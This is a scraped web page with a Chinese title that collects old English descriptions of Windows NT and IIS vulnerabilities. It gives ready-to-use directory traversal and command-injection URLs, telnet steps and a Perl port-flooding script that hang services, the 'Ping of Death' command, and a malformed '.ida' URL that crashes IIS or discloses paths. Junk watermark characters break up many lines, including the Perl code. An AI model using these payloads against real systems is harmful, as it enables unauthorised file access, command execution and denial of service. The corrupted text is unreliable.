NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
7 ~; n3 i# s- x/ u) s$ b3 x
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
* b6 y. o( }- y+ N0 |" r) R
* z; A" d9 Q* XBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

: h& L# Y# I7 X& Z+ R" l/ z$ Y5 W--------------------------------------------------------------------

受影響系統(tǒng):4.0
4 B" `) @0 Y' EA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

2 ^# N) _6 P; h+ p: R3 u9 IIf the file 'target.bat' exists, the file will be truncated.
1 k$ q6 F" Q" {4 E$ a

0 d- K1 [0 U" LA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
& y+ U# D; L% M5 V7 ]+ [3 _- Q
----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.

The following steps;
, d$ o  f+ h8 n6 d+ a+ h: ?
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

4 W* F6 p0 {" m' c: G3 ~, rWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
+ B! i" ^; I3 |5 ]5 F8 C
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

$ R( K9 q) b. z" u( r/*begin poke code*/

+ D* a# f+ Y# A2 G' I, Guse Socket;
3 h% s4 {, l; R% B! B  N, iuse FileHandle;
require "chat2.pl";

  H0 v( ]& F+ d/ D$systemname = $ARGV[0] && shift;
# n" I4 a2 [% q% K- C
: }7 y* U' x% x% l9 x- W2 N) [: z$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
: }! q- E. i7 |, Q+ H9 B2 a& Kfor ($port = $0; $port<65535; $port++)
- z  `4 R7 P2 ]# k{
: z+ ?2 |, x- K+ h% c$ u* A

if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
! ?) r  N0 ?- b7 s1 M}
' |2 @+ e/ }$ O% r/ Z; {" M0 A$fh = chat::open_port($systemname, $port);
3 S3 F1 N; X. z- M- x; R. s  |chat::print ($fh,"This is about ten characters or more");
0 o/ N9 p9 p+ C; T: n4 G+ G5 V* jif ($verbose) {
5 j9 j3 \, k/ F/ j( tprint "Trying port: $port\n";
' s- ~( h+ p6 T1 B# g1 j2 l3 J4 Z}
chat::close($fh);
6 P- _# R# b# N
6 W& d+ \3 v: e# s% P}
/ _- s* f# R4 b" T

/*end poke code*/
6 G2 f4 I/ K* H
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

受影響系統(tǒng):4.0
$ @- H0 }# f2 |0 b% h% K6 Z; iUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
: D4 M$ p# q; D4 f" R
  p# j8 ~8 f' v" _% i. oThis attack causes Dr. Watson to display an alert window and to log an error:
- q8 G& B" k, v! p) w/ B+ n. A8 o
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

' `$ _1 a' N0 @) f3 ^" s--------------------------------------------------------------------------------

$ c+ Z1 E* @5 C  r+ p8 W" F3 K受影響系統(tǒng):3.51,4.0
7 `/ S, F1 C+ z& z: W7 s# Y9 ILarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
  _& y- g+ f* A- M5 E% d! U
STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
+ _9 \. B& V# ~+ z4 A
  j/ ]  A" d+ g$ Z4 ?9 l9 e8 _-OR-

STOP: 0x0000000A
9 N$ ~# n$ K: X1 R, R3 RIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

) ~8 d5 N2 A% e$ X) t/ {--------------------------------------------------------------------------------

) S5 ]7 }, }% h) w' NMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
+ m1 F( I7 |+ w2 Z) g7 P! a
1 x, v' A( a4 x- n( d--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server